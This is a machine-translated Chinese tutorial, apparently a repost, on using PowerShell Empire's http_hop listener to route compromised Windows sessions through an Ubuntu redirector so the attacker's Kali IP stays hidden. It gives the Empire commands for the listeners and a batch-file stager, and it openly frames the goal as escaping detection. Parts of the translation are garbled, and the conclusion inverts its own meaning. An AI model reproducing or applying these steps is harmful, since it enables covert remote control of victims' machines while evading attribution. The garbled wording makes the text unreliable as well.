zoukankan
html css js c++ java
使用PowerShell Empire(http_hop)隐藏IP
在本文中,我们学习了在PowerShell帝国中使用跃点有效负载。Empire拥有一个名为http_hop的内置侦听器,它使我们可以在获取代理后将流量重定向到另一个活动的侦听器之一。因此,名称将其从一个侦听器跳到另一个侦听器时进行跳转,以重定向流量。
与Metasploit相似,帝国中的跃点侦听器使用hop.php文件。当您激活跳侦听器时,它将生成三个PHP文件,这些文件将重定向您现有的侦听器。将所述文件放在您的跳转服务器(ubuntu)中,然后根据调解器(即我们的跃点监听器)获取会话,从而设置您的stager。
在下图中,您可以看到我们Kali的IP。现在,我们将尝试使用http_hop有效负载通过ubuntu进行Windows会话,以便隐藏我们自己的IP,即,基本上,我们的http_hop有效负载将帮助我们(攻击者)从被捕获的位置隐藏。
在下图中,您也可以看到我们的ubuntu的IP
。
现在,让我们开始吧。首先,对于该类型,我们应该有一个简单的http侦听器:
uselistener http
execute
现在,输入以下命令启动http_hop侦听器:
uselistener http_hop
set RedirectListener http
set Host //192.168.1.111
在这里,我们给了RedirectListener,即来自http监听器的所有流量都将被定向到 http_hop 监听器。
执行上面的侦听器将创建三个文件,如上图所示。将这些文件传输到 Ubuntu的/ var / www / html位置,如下图所示:
现在,您可以在下图中看到我们激活了两个侦听器:
让我们通过键入以下命令来启动stager
:
usestager windows/launcher_bat
set Listener http_hop
execute
在目标PC中执行了bat文件后,我们将进行会话。现在,如果您观察到我们通过其获取会话的IP是 Ubuntu的,而不是Windows的,但是我们可以访问 Windows PC,同样,在Windows中,它将显示攻击的计算机是Ubuntu,而不是kali。因此,我们的http_hop是有效的。
总之, http_hop 侦听器的主要优点是,由于该侦听器隐藏了原始IP,因此可以帮助将攻击者识别为在目标PC上。
查看全文
相关阅读:
SQL语句创建数据库,SQL语句删除数据库,SQL语句创建表,SQL语句删除表,SQL语句添加约束,SQL语句删除约束
数据查询基础
用SQL语句操作数据库
2.样式表的分类
1.CSS中的定位机制
MySQL子查询subquery
MySQL限制查询结果返回的数量limit
MySQL对结果进行排序order by
MySQL 查询结果分组 group by
MySQL where 表达式
原文地址:https://www.cnblogs.com/sup3rman/p/13725093.html
最新文章
高性能网络编程(一):单台服务器并发TCP连接数到底可以有多少
c++ 三五法则 自己理解
机器学习 归一化 学习以及代码
solr 启动过程分析
过滤器
elasticsearch SpanNearQuery inOrder参数
redis 数据类型的使用场景
solr in action
扩展 RequestHandlerBase
sqlserver中case when then用法
热门文章
solr requestHandler
resin + eclipse 遇到的问题
linux 域名硬解析
override和overload的区别
AppSettings和ConnectionStrings的区别
ADO.NET事务处理,初始回调函数,多张表的数据在同一个DataGridView中展示
文件操作
xml
面向对象的七大原则
全局变量之总结
Copyright © 2011-2022 走看看